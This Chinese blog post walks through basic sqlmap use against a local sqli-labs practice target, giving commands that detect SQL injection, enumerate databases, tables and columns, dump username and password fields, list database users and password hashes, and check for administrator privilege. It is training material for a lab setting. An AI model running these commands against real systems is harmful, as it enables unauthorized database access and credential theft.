首页 Web开发 Windows程序 编程语言 数据库 移动开发 系统相关 微信 其他好文

SQL注入神器sqlmap的简单使用

时间:2020-10-18 09:37:53   收藏:0   阅读:24

(1)判断是否存在注入[sqlmap -u "http://192.168.233.128/sqli/Less-1/?id=1"]

技术图片

分析扫描的结果能看到存在联合查询,报错,布尔,时间

(2)查询当前用户下的所有数据库[sqlmap -u "http://192.168.233.128/sqli/Less-1/?id=1" --dbs]

技术图片

(3)获取数据库中的表名[sqlmap -u "http://192.168.233.128/sqli/Less-1/?id=1" -D security --tables]

技术图片

(4)获取表中的字段名[sqlmap -u "http://192.168.233.128/sqli/Less-1/?id=1" -D security -T users --columns]

技术图片

(5)获取字段内容

[sqlmap -u "http://192.168.233.128/sqli/Less-1/?id=1" -D security -T users -C username,password --dump]

技术图片

(6)获取数据库的所有用户[sqlmap -u "http://192.168.233.128/sqli/Less-1/?id=1" --users]

技术图片

(7)获取数据库用户的密码[sqlmap -u "http://192.168.233.128/sqli/Less-1/?id=1" --passwords]

技术图片

(8)获取当前网站数据库的名称[sqlmap -u "http://192.168.233.128/sqli/Less-1/?id=1" --current-db]

技术图片

(9)获取当前网站数据库的用户名[sqlmap -u "http://192.168.233.128/sqli/Less-1/?id=1" --current-user]

技术图片

 

(10)--is-dba :查看当前用户是否为管理员权限[sqlmap -u "http://192.168.233.128/sqli/Less-1/?id=1" --is-dba --level 5]

技术图片

 

评论(0
© 2014 mamicode.com 版权所有 京ICP备13008772号-2  联系我们:gaon5@hotmail.com
迷上了代码!